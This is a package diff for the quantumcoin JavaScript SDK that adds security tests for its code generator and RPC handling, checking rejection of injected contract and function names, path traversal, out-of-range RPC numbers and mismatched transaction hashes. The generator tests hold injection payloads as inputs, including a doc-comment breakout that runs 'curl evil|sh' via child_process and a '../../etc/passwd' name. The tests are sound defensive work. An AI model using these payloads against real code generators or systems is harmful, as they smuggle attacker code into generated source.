quantumcoin 7.0.13 → 7.0.14

package/test/security/generator-injection.test.js

@@ -0,0 +1,195 @@
+/**
+ * @testCategory security
+ * @blockchainRequired false
+ * @transactional false
+ * @description Code-injection and path-traversal protections in the SDK
+ *              generator. Attacker-controlled contract/function names (and tuple
+ *              names derived from internalType) must never break out of the
+ *              generated source or escape the output directory.
+ */
+
+const { describe, it } = require("node:test");
+const assert = require("node:assert/strict");
+const fs = require("node:fs");
+const os = require("node:os");
+const path = require("node:path");
+
+const {
+  generate,
+  generateFromArtifacts,
+  generateTransactionalTestJs,
+  assertSafeIdentifier,
+} = require("../../src/generator");
+const { logSuite, logTest } = require("../verbose-logger");
+
+function _tmpOut() {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), "qcgen-inj-"));
+  return path.join(tmp, "out");
+}
+
+describe("Security: generator code-injection & path-traversal", () => {
+  logSuite("Security: generator code-injection & path-traversal");
+
+  it("assertSafeIdentifier rejects breakout strings and reserved words", () => {
+    logTest("assertSafeIdentifier rejects breakout strings and reserved words", {});
+    assert.throws(() => assertSafeIdentifier('Evil"; console.log(1); //', "contract name"));
+    assert.throws(() => assertSafeIdentifier("../../etc/passwd", "contract name"));
+    assert.throws(() => assertSafeIdentifier("with-dash", "contract name"));
+    assert.throws(() => assertSafeIdentifier("__proto__", "contract name"));
+    assert.throws(() => assertSafeIdentifier("class", "contract name"));
+    assert.throws(() => assertSafeIdentifier("", "contract name"));
+    assert.throws(() => assertSafeIdentifier(123, "contract name"));
+    // Positive: valid identifiers are returned unchanged.
+    assert.equal(assertSafeIdentifier("TestToken", "contract name"), "TestToken");
+    assert.equal(assertSafeIdentifier("_balanceOf$2", "fn"), "_balanceOf$2");
+  });
+
+  it("rejects a malicious contractName (negative)", () => {
+    logTest("rejects a malicious contractName (negative)", {});
+    const abi = [{ type: "function", name: "ok", stateMutability: "view", inputs: [], outputs: [] }];
+    assert.throws(
+      () =>
+        generateFromArtifacts({
+          outDir: _tmpOut(),
+          lang: "ts",
+          artifacts: [{ contractName: 'Evil { static x = require("child_process"); } //', abi, bytecode: "0x00" }],
+        }),
+      /Unsafe contract name|reserved word/i,
+    );
+  });
+
+  it("rejects a path-traversal contractName (negative)", () => {
+    logTest("rejects a path-traversal contractName (negative)", {});
+    const abi = [{ type: "function", name: "ok", stateMutability: "view", inputs: [], outputs: [] }];
+    assert.throws(
+      () =>
+        generateFromArtifacts({
+          outDir: _tmpOut(),
+          lang: "ts",
+          artifacts: [{ contractName: "../../evil", abi, bytecode: "0x00" }],
+        }),
+      /Unsafe contract name/i,
+    );
+  });
+
+  it("rejects a malicious ABI function name (negative)", () => {
+    logTest("rejects a malicious ABI function name (negative)", {});
+    const abi = [
+      { type: "function", name: 'foo(){}; const x = 1; bar', stateMutability: "view", inputs: [], outputs: [] },
+    ];
+    assert.throws(
+      () =>
+        generateFromArtifacts({
+          outDir: _tmpOut(),
+          lang: "ts",
+          artifacts: [{ contractName: "Good", abi, bytecode: "0x00" }],
+        }),
+      /Unsafe ABI function name/i,
+    );
+    // Also covered by the transactional-test generator entry point.
+    assert.throws(
+      () => generateTransactionalTestJs({ contractName: "Good", abi, bytecode: "0x00" }),
+      /Unsafe ABI function name/i,
+    );
+  });
+
+  it("sanitizes malicious tuple names derived from internalType (negative-input, safe-output)", () => {
+    logTest("sanitizes malicious tuple names derived from internalType", {});
+    const outDir = _tmpOut();
+    const abi = [
+      {
+        type: "function",
+        name: "getStruct",
+        stateMutability: "view",
+        inputs: [],
+        outputs: [
+          {
+            name: "s",
+            type: "tuple",
+            internalType: 'struct Evil"]; const pwned = 1; //[',
+            components: [{ name: "a", type: "uint256" }],
+          },
+        ],
+      },
+    ];
+    const res = generateFromArtifacts({ outDir, lang: "ts", artifacts: [{ contractName: "Holder", abi, bytecode: "0x00" }] });
+    const contractSrc = fs.readFileSync(res.contracts[0].contractFile, "utf8");
+    // The tuple type name is derived from the attacker-controlled internalType.
+    // It MUST be emitted as a valid, sanitized TS identifier (the raw payload may
+    // only survive inside the escaped ABI JSON string literal, never as code).
+    const typeDecls = [...contractSrc.matchAll(/export type ([^\s=]+)\s*=/g)].map((m) => m[1]);
+    assert.ok(typeDecls.length >= 1, "a struct type should be generated");
+    for (const id of typeDecls) {
+      assert.match(id, /^[A-Za-z_$][A-Za-z0-9_$]*$/, `tuple type identifier must be sanitized: ${id}`);
+    }
+  });
+
+  it("neutralizes a NatSpec doc-comment breakout in contract & function docs (negative)", () => {
+    logTest("neutralizes a NatSpec doc-comment breakout", {});
+    const payload = `Legit text */ require('child_process').execSync('curl evil|sh'); /* keep`;
+    const abi = [{ type: "function", name: "transfer", stateMutability: "nonpayable", inputs: [], outputs: [] }];
+    const docs = { contract: payload, functions: { transfer: payload } };
+
+    for (const lang of ["ts", "js"]) {
+      const res = generateFromArtifacts({
+        outDir: _tmpOut(),
+        lang,
+        artifacts: [{ contractName: "Doc", abi, bytecode: "0x00", docs }],
+      });
+      const src = fs.readFileSync(res.contracts[0].contractFile, "utf8");
+      // The comment terminator must be neutralized so it cannot close the JSDoc
+      // block early; the payload may only survive as inert comment text.
+      assert.ok(!src.includes("*/ require"), `[${lang}] doc breakout must be neutralized`);
+      assert.ok(src.includes("* /"), `[${lang}] escaped terminator should be present`);
+      // Belt-and-suspenders: every '*/' in the file must be a real JSDoc close,
+      // i.e. it is the last non-space token on its line (' */').
+      for (const line of src.split(/\r?\n/g)) {
+        const idx = line.indexOf("*/");
+        if (idx !== -1) {
+          assert.match(line.trimEnd(), /\*\/$/, `unexpected mid-line */ (possible breakout): ${line}`);
+        }
+      }
+    }
+  });
+
+  it("renders a benign NatSpec doc normally (positive)", () => {
+    logTest("renders a benign NatSpec doc normally", {});
+    const abi = [{ type: "function", name: "transfer", stateMutability: "nonpayable", inputs: [], outputs: [] }];
+    const docs = { contract: "Transfers tokens between accounts.", functions: { transfer: "Moves amount to recipient." } };
+    const res = generateFromArtifacts({
+      outDir: _tmpOut(),
+      lang: "ts",
+      artifacts: [{ contractName: "Doc", abi, bytecode: "0x00", docs }],
+    });
+    const src = fs.readFileSync(res.contracts[0].contractFile, "utf8");
+    assert.ok(src.includes("* Transfers tokens between accounts."), "benign contract doc should render");
+    assert.ok(src.includes("* Moves amount to recipient."), "benign function doc should render");
+  });
+
+  it("generates valid output and preserves legitimate identifiers (positive)", () => {
+    logTest("generates valid output and preserves legitimate identifiers (positive)", {});
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), "qcgen-ok-"));
+    const abiPath = path.join(tmp, "Test.abi.json");
+    const binPath = path.join(tmp, "Test.bin");
+    const outDir = path.join(tmp, "out");
+    const abi = [
+      {
+        type: "function",
+        name: "balanceOf",
+        stateMutability: "view",
+        inputs: [{ name: "account", type: "address" }],
+        outputs: [{ name: "", type: "uint256" }],
+      },
+    ];
+    fs.writeFileSync(abiPath, JSON.stringify(abi), "utf8");
+    fs.writeFileSync(binPath, "0x6000", "utf8");
+    const res = generate({ abiPath, binPath, outDir, contractName: "TestToken" });
+    const src = fs.readFileSync(res.contractFile, "utf8");
+    assert.ok(src.includes("export class TestToken"));
+    assert.ok(src.includes("async balanceOf"));
+    // All generated files must live inside outDir (no traversal).
+    for (const f of [res.contractFile, res.factoryFile, res.typesFile, res.indexFile]) {
+      assert.ok(path.resolve(f).startsWith(path.resolve(outDir)), `${f} must be inside outDir`);
+    }
+  });
+});

package/test/security/malformed-input.test.js

@@ -3,7 +3,6 @@
  * @blockchainRequired false
  * @transactional false
  * @description Security tests for malformed input, edge cases, and invalid values.
- *              Covers all findings from the consolidated security audit.
  * Run with VERBOSE=1 for test names.
  */
 
@@ -36,8 +35,8 @@ describe("Security: Malformed Input", () => {
   });
 });
 
-describe("Security: C1 - Private key enumeration protection", () => {
-  logSuite("Security: C1 - Private key enumeration protection");
+describe("Security: Private key enumeration protection", () => {
+  logSuite("Security: Private key enumeration protection");
 
   it("JSON.stringify(wallet) must NOT contain privateKey or seed", async () => {
     logTest("JSON.stringify(wallet) must NOT contain privateKey or seed", {});
@@ -79,8 +78,8 @@ describe("Security: C1 - Private key enumeration protection", () => {
   });
 });
 
-describe("Security: C3 - Wallet.connect() preserves state", () => {
-  logSuite("Security: C3 - Wallet.connect() preserves state");
+describe("Security: Wallet.connect() preserves state", () => {
+  logSuite("Security: Wallet.connect() preserves state");
 
   it("connect() preserves seed", async () => {
     logTest("connect() preserves seed", {});
@@ -96,8 +95,8 @@ describe("Security: C3 - Wallet.connect() preserves state", () => {
   });
 });
 
-describe("Security: C4 - KDF string password handling", () => {
-  logSuite("Security: C4 - KDF string password handling");
+describe("Security: KDF string password handling", () => {
+  logSuite("Security: KDF string password handling");
 
   it("pbkdf2 with plain string password does not crash", async () => {
     logTest("pbkdf2 with plain string password does not crash", {});
@@ -121,8 +120,8 @@ describe("Security: C4 - KDF string password handling", () => {
   });
 });
 
-describe("Security: H2 - Numeric precision in signTransaction", () => {
-  logSuite("Security: H2 - Numeric precision in signTransaction");
+describe("Security: Numeric precision in signTransaction", () => {
+  logSuite("Security: Numeric precision in signTransaction");
 
   it("rejects number value above MAX_SAFE_INTEGER", async () => {
     logTest("rejects number value above MAX_SAFE_INTEGER", {});
@@ -157,8 +156,8 @@ describe("Security: H2 - Numeric precision in signTransaction", () => {
   });
 });
 
-describe("Security: M3 - Password strength enforcement", () => {
-  logSuite("Security: M3 - Password strength enforcement");
+describe("Security: Password strength enforcement", () => {
+  logSuite("Security: Password strength enforcement");
 
   it("encryptSync rejects password shorter than 12 characters", async () => {
     logTest("encryptSync rejects password shorter than 12 characters", {});
@@ -177,8 +176,8 @@ describe("Security: M3 - Password strength enforcement", () => {
   });
 });
 
-describe("Security: M4 - Message signing removed", () => {
-  logSuite("Security: M4 - Message signing removed");
+describe("Security: Message signing removed", () => {
+  logSuite("Security: Message signing removed");
 
   it("hashMessage is not exported", () => {
     logTest("hashMessage is not exported", {});
@@ -201,8 +200,8 @@ describe("Security: M4 - Message signing removed", () => {
   });
 });
 
-describe("Security: M6 - Error messages do not leak secrets", () => {
-  logSuite("Security: M6 - Error messages do not leak secrets");
+describe("Security: Error messages do not leak secrets", () => {
+  logSuite("Security: Error messages do not leak secrets");
 
   it("fromKeys error does not contain actual key bytes", async () => {
     logTest("fromKeys error does not contain actual key bytes", {});
@@ -218,8 +217,8 @@ describe("Security: M6 - Error messages do not leak secrets", () => {
   });
 });
 
-describe("Security: M7 - _hexToBigInt handles '0x'", () => {
-  logSuite("Security: M7 - _hexToBigInt handles '0x'");
+describe("Security: _hexToBigInt handles '0x'", () => {
+  logSuite("Security: _hexToBigInt handles '0x'");
 
   it("getBalance does not crash on '0x' response", async () => {
     logTest("getBalance does not crash on '0x' response", {});
@@ -227,8 +226,8 @@ describe("Security: M7 - _hexToBigInt handles '0x'", () => {
   });
 });
 
-describe("Security: L3 - RLP depth limit", () => {
-  logSuite("Security: L3 - RLP depth limit");
+describe("Security: RLP depth limit", () => {
+  logSuite("Security: RLP depth limit");
 
   it("rejects deeply nested RLP (depth > 64)", () => {
     logTest("rejects deeply nested RLP (depth > 64)", {});
@@ -248,8 +247,8 @@ describe("Security: L3 - RLP depth limit", () => {
   });
 });
 
-describe("Security: M2 - Seed phrase with invalid words", () => {
-  logSuite("Security: M2 - Seed phrase with invalid words");
+describe("Security: Seed phrase with invalid words", () => {
+  logSuite("Security: Seed phrase with invalid words");
 
   it("rejects gibberish words of correct count", async () => {
     logTest("rejects gibberish words of correct count", {});
@@ -269,8 +268,8 @@ describe("Security: M2 - Seed phrase with invalid words", () => {
   });
 });
 
-describe("Security: L6 - Keccak-256 test vectors", () => {
-  logSuite("Security: L6 - Keccak-256 test vectors");
+describe("Security: Keccak-256 test vectors", () => {
+  logSuite("Security: Keccak-256 test vectors");
 
   it("keccak256 of empty bytes matches known digest", async () => {
     logTest("keccak256 of empty bytes matches known digest", {});
@@ -293,8 +292,8 @@ describe("Security: L6 - Keccak-256 test vectors", () => {
   });
 });
 
-describe("Security: H5 - BigInt in provider params", () => {
-  logSuite("Security: H5 - BigInt in provider params");
+describe("Security: BigInt in provider params", () => {
+  logSuite("Security: BigInt in provider params");
 
   it("JsonRpcProvider serializes BigInt params without crashing", async (t) => {
     logTest("JsonRpcProvider serializes BigInt params without crashing", {});
@@ -318,8 +317,8 @@ describe("Security: H5 - BigInt in provider params", () => {
   });
 });
 
-describe("Security: H6 - Per-instance RPC IDs", () => {
-  logSuite("Security: H6 - Per-instance RPC IDs");
+describe("Security: Per-instance RPC IDs", () => {
+  logSuite("Security: Per-instance RPC IDs");
 
   it("different provider instances have independent ID counters", () => {
     logTest("different provider instances have independent ID counters", {});

package/test/security/rpc-numeric-bounds.test.js

@@ -0,0 +1,81 @@
+/**
+ * @testCategory security
+ * @blockchainRequired false
+ * @transactional false
+ * @description RPC quantities are untrusted. A value above
+ *              Number.MAX_SAFE_INTEGER must fail loudly instead of being silently
+ *              truncated by Number(BigInt(...)). The decoder keeps returning a
+ *              `number` (no signature change); only out-of-range values throw.
+ */
+
+const { describe, it } = require("node:test");
+const assert = require("node:assert/strict");
+
+const { Initialize } = require("../../config");
+const qc = require("../../index");
+const { logSuite, logTest } = require("../verbose-logger");
+
+// 2^53 = 9007199254740992 = one past Number.MAX_SAFE_INTEGER.
+const UNSAFE_HEX = "0x20000000000000";
+const TX_HASH = "0x" + "aa".repeat(32);
+
+class NumProvider extends qc.AbstractProvider {
+  constructor(map) {
+    super();
+    this._map = map;
+  }
+  async _perform(method) {
+    return Object.prototype.hasOwnProperty.call(this._map, method) ? this._map[method] : null;
+  }
+}
+
+describe("Security: untrusted RPC quantity bounds", () => {
+  logSuite("Security: untrusted RPC quantity bounds");
+
+  it("getBlockNumber throws for a value above MAX_SAFE_INTEGER (negative)", async () => {
+    logTest("getBlockNumber rejects an out-of-range quantity", {});
+    await Initialize(null);
+    const p = new NumProvider({ eth_blockNumber: UNSAFE_HEX });
+    await assert.rejects(() => p.getBlockNumber(), /safe integer range/i);
+  });
+
+  it("getBlock throws when block.number exceeds MAX_SAFE_INTEGER (negative)", async () => {
+    logTest("getBlock rejects an out-of-range block number", {});
+    await Initialize(null);
+    const p = new NumProvider({
+      eth_getBlockByNumber: { hash: "0x" + "11".repeat(32), number: UNSAFE_HEX, timestamp: "0x1", transactions: [] },
+    });
+    await assert.rejects(() => p.getBlock("latest"), /safe integer range/i);
+  });
+
+  it("getTransactionReceipt throws when a quantity exceeds MAX_SAFE_INTEGER (negative)", async () => {
+    logTest("getTransactionReceipt rejects an out-of-range quantity", {});
+    await Initialize(null);
+    const p = new NumProvider({
+      eth_getTransactionReceipt: { transactionHash: TX_HASH, blockNumber: UNSAFE_HEX, status: "0x1" },
+    });
+    await assert.rejects(() => p.getTransactionReceipt(TX_HASH), /safe integer range/i);
+  });
+
+  it("decodes normal in-range quantities to the correct number (positive)", async () => {
+    logTest("decodes in-range quantities correctly", {});
+    await Initialize(null);
+    const p = new NumProvider({
+      eth_blockNumber: "0x10",
+      eth_getTransactionReceipt: {
+        transactionHash: TX_HASH,
+        blockNumber: "0x5",
+        transactionIndex: "0x0",
+        status: "0x1",
+      },
+    });
+    const bn = await p.getBlockNumber();
+    assert.equal(bn, 16);
+    assert.equal(typeof bn, "number");
+
+    const receipt = await p.getTransactionReceipt(TX_HASH);
+    assert.equal(receipt.blockNumber, 5);
+    assert.equal(typeof receipt.blockNumber, "number");
+    assert.equal(receipt.status, 1);
+  });
+});

package/test/security/rpc-trust.test.js

@@ -0,0 +1,202 @@
+/**
+ * @testCategory security
+ * @blockchainRequired false
+ * @transactional false
+ * @description Do not trust the RPC node. A broadcast must be rejected if
+ *              the node returns a transaction hash different from the one we
+ *              signed, and event logs from foreign contract addresses must be
+ *              dropped from getLogs results.
+ */
+
+const { describe, it } = require("node:test");
+const assert = require("node:assert/strict");
+
+const { Initialize } = require("../../config");
+const qc = require("../../index");
+const { logSuite, logTest } = require("../verbose-logger");
+
+const SIGNED_HASH = "0x" + "aa".repeat(32);
+
+class SendProvider extends qc.AbstractProvider {
+  constructor(returnedHash) {
+    super();
+    this._returnedHash = returnedHash;
+  }
+  async _perform(method) {
+    if (method === "eth_sendRawTransaction") return this._returnedHash;
+    if (method === "eth_getTransactionByHash") return { hash: this._returnedHash };
+    return null;
+  }
+}
+
+describe("Security: RPC broadcast hash verification", () => {
+  logSuite("Security: RPC broadcast hash verification");
+
+  it("throws when the node returns a different hash than the signed tx (negative)", async () => {
+    logTest("throws when the node returns a different hash than the signed tx", {});
+    await Initialize(null);
+    const p = new SendProvider("0x" + "bb".repeat(32));
+    await assert.rejects(
+      () => p.sendTransaction("0xrawsigned", { expectedHash: SIGNED_HASH }),
+      /does not match the signed transaction/i,
+    );
+  });
+
+  it("returns the response when the node hash matches (positive, case-insensitive)", async () => {
+    logTest("returns the response when the node hash matches", {});
+    await Initialize(null);
+    const p = new SendProvider(SIGNED_HASH);
+    const resp = await p.sendTransaction("0xrawsigned", { expectedHash: SIGNED_HASH.toUpperCase() });
+    assert.ok(resp && typeof resp.hash === "string");
+    assert.equal(resp.hash.toLowerCase(), SIGNED_HASH);
+  });
+
+  it("without expectedHash, sendTransaction stays backward compatible", async () => {
+    logTest("without expectedHash, sendTransaction stays backward compatible", {});
+    await Initialize(null);
+    const p = new SendProvider(SIGNED_HASH);
+    const resp = await p.sendTransaction("0xrawsigned");
+    assert.equal(resp.hash, SIGNED_HASH);
+  });
+});
+
+class LogProvider extends qc.AbstractProvider {
+  constructor(logs) {
+    super();
+    this._logs = logs;
+  }
+  async _perform(method) {
+    if (method === "eth_getLogs") return this._logs;
+    return null;
+  }
+}
+
+describe("Security: event-log provenance", () => {
+  logSuite("Security: event-log provenance");
+
+  it("drops logs whose address does not match the filter (negative) and keeps matching ones (positive)", async () => {
+    logTest("drops foreign-address logs and keeps matching ones", {});
+    await Initialize(null);
+    const target = "0x" + "11".repeat(32);
+    const foreign = "0x" + "99".repeat(32);
+    const p = new LogProvider([
+      { address: target, topics: [], data: "0x", blockNumber: "0x1" },
+      { address: foreign, topics: [], data: "0x", blockNumber: "0x1" },
+      { address: target.toUpperCase(), topics: [], data: "0x", blockNumber: "0x1" },
+    ]);
+
+    const logs = await p.getLogs({ address: target });
+    assert.equal(logs.length, 2, "only logs from the requested address survive");
+    for (const l of logs) {
+      assert.equal(l.address.toLowerCase(), target.toLowerCase());
+    }
+  });
+
+  it("returns all logs when no address filter is given (positive)", async () => {
+    logTest("returns all logs when no address filter is given", {});
+    await Initialize(null);
+    const p = new LogProvider([
+      { address: "0x" + "11".repeat(32), topics: [], data: "0x" },
+      { address: "0x" + "99".repeat(32), topics: [], data: "0x" },
+    ]);
+    const logs = await p.getLogs({ fromBlock: 0 });
+    assert.equal(logs.length, 2);
+  });
+});
+
+const AA = "0x" + "aa".repeat(32);
+const BB = "0x" + "bb".repeat(32);
+
+class HashProvider extends qc.AbstractProvider {
+  constructor(obj) {
+    super();
+    this._obj = obj;
+  }
+  async _perform(method) {
+    if (method === "eth_getTransactionByHash") return this._obj;
+    if (method === "eth_getTransactionReceipt") return this._obj;
+    return null;
+  }
+}
+
+describe("Security: read-back / confirmation hash verification", () => {
+  logSuite("Security: read-back / confirmation hash verification");
+
+  it("getTransaction throws when the returned hash differs from the requested hash (negative)", async () => {
+    logTest("getTransaction rejects a mismatched returned hash", {});
+    await Initialize(null);
+    const p = new HashProvider({ hash: BB });
+    await assert.rejects(() => p.getTransaction(AA), /does not match the requested hash/i);
+  });
+
+  it("getTransaction returns the response when the hash matches (positive)", async () => {
+    logTest("getTransaction accepts a matching hash", {});
+    await Initialize(null);
+    const p = new HashProvider({ hash: AA });
+    const tx = await p.getTransaction(AA);
+    assert.equal(tx.hash, AA);
+  });
+
+  it("getTransactionReceipt throws when transactionHash differs (negative)", async () => {
+    logTest("getTransactionReceipt rejects a mismatched receipt", {});
+    await Initialize(null);
+    const p = new HashProvider({ transactionHash: BB, blockNumber: "0x1" });
+    await assert.rejects(() => p.getTransactionReceipt(AA), /does not match the requested hash/i);
+  });
+
+  it("wait() rejects when the node returns a receipt for a different tx (negative)", async () => {
+    logTest("wait() rejects a mismatched receipt", {});
+    await Initialize(null);
+    const p = new HashProvider({ transactionHash: BB, blockNumber: "0x1" });
+    const resp = new qc.TransactionResponse({ hash: AA }, p);
+    await assert.rejects(() => resp.wait(1, 5000), /does not match the requested hash/i);
+  });
+});
+
+describe("Security: event-log topic binding", () => {
+  logSuite("Security: event-log topic binding");
+
+  const eventAbi = [
+    {
+      type: "event",
+      name: "Transfer",
+      anonymous: false,
+      inputs: [
+        { name: "from", type: "address", indexed: true },
+        { name: "to", type: "address", indexed: true },
+        { name: "value", type: "uint256", indexed: false },
+      ],
+    },
+  ];
+
+  it("getLogs drops logs whose topic0 does not match the requested topic (negative+positive)", async () => {
+    logTest("getLogs filters by topic0", {});
+    await Initialize(null);
+    const addr = "0x" + "11".repeat(32);
+    const wanted = "0x" + "cc".repeat(32);
+    const other = "0x" + "dd".repeat(32);
+    const p = new LogProvider([
+      { address: addr, topics: [wanted], data: "0x", blockNumber: "0x1" },
+      { address: addr, topics: [other], data: "0x", blockNumber: "0x1" },
+    ]);
+    const logs = await p.getLogs({ address: addr, topics: [wanted] });
+    assert.equal(logs.length, 1);
+    assert.equal(logs[0].topics[0], wanted);
+  });
+
+  it("queryFilter only returns logs matching the event's topic0 (negative+positive)", async () => {
+    logTest("queryFilter binds results to the event topic", {});
+    await Initialize(null);
+    const addr = "0x" + "11".repeat(32);
+    const topic0 = new qc.Interface(eventAbi).getEventTopic("Transfer");
+    const wrong = "0x" + "ee".repeat(32);
+    const p = new LogProvider([
+      { address: addr, topics: [topic0], data: "0x", blockNumber: "0x1" },
+      { address: addr, topics: [wrong], data: "0x", blockNumber: "0x1" },
+    ]);
+    const contract = new qc.Contract(addr, eventAbi, p);
+    const events = await contract.queryFilter("Transfer", 0, "latest");
+    assert.equal(events.length, 1, "only the matching-topic log survives");
+    assert.equal(events[0].topics[0], topic0);
+  });
+});

package/test/unit/abi-interface.test.js

@@ -87,11 +87,18 @@
      const iface = new qc.Interface([]);
      assert.throws(() => iface.parseTransaction(), (e) => e && e.code === "NOT_IMPLEMENTED");
      assert.throws(() => iface.parseError(), (e) => e && e.code === "NOT_IMPLEMENTED");
-     assert.throws(() => iface.getSighash(), (e) => e && e.code === "NOT_IMPLEMENTED");
-     assert.throws(() => iface.getEventTopic(), (e) => e && e.code === "NOT_IMPLEMENTED");
-     assert.equal(iface.getFallback(), null);
-     assert.equal(iface.getReceive(), null);
-   });
+    assert.throws(() => iface.getSighash(), (e) => e && e.code === "NOT_IMPLEMENTED");
+    assert.equal(iface.getFallback(), null);
+    assert.equal(iface.getReceive(), null);
+  });
+
+  it("getEventTopic returns the event signature hash", () => {
+    const iface = new qc.Interface([
+      { type: "event", name: "E", anonymous: false, inputs: [{ name: "x", type: "uint256", indexed: false }] },
+    ]);
+    assert.match(iface.getEventTopic("E"), /^0x[0-9a-f]{64}$/);
+    assert.throws(() => iface.getEventTopic("Nope"), (e) => e && e.code === "INVALID_ARGUMENT");
+  });
  });
  
  describe("AbiCoder", () => {

package/test/unit/abi-interface.test.ts

@@ -88,10 +88,17 @@ describe("Interface", () => {
     assert.throws(() => iface.parseTransaction(), (e: Error & { code?: string }) => e && e.code === "NOT_IMPLEMENTED");
     assert.throws(() => iface.parseError(), (e: Error & { code?: string }) => e && e.code === "NOT_IMPLEMENTED");
     assert.throws(() => iface.getSighash(), (e: Error & { code?: string }) => e && e.code === "NOT_IMPLEMENTED");
-    assert.throws(() => iface.getEventTopic(), (e: Error & { code?: string }) => e && e.code === "NOT_IMPLEMENTED");
     assert.equal(iface.getFallback(), null);
     assert.equal(iface.getReceive(), null);
   });
+
+  it("getEventTopic returns the event signature hash", () => {
+    const iface = new qc.Interface([
+      { type: "event", name: "E", anonymous: false, inputs: [{ name: "x", type: "uint256", indexed: false }] },
+    ]);
+    assert.match(iface.getEventTopic("E"), /^0x[0-9a-f]{64}$/);
+    assert.throws(() => iface.getEventTopic("Nope"), (e: Error & { code?: string }) => e && e.code === "INVALID_ARGUMENT");
+  });
 });
 
 describe("AbiCoder", () => {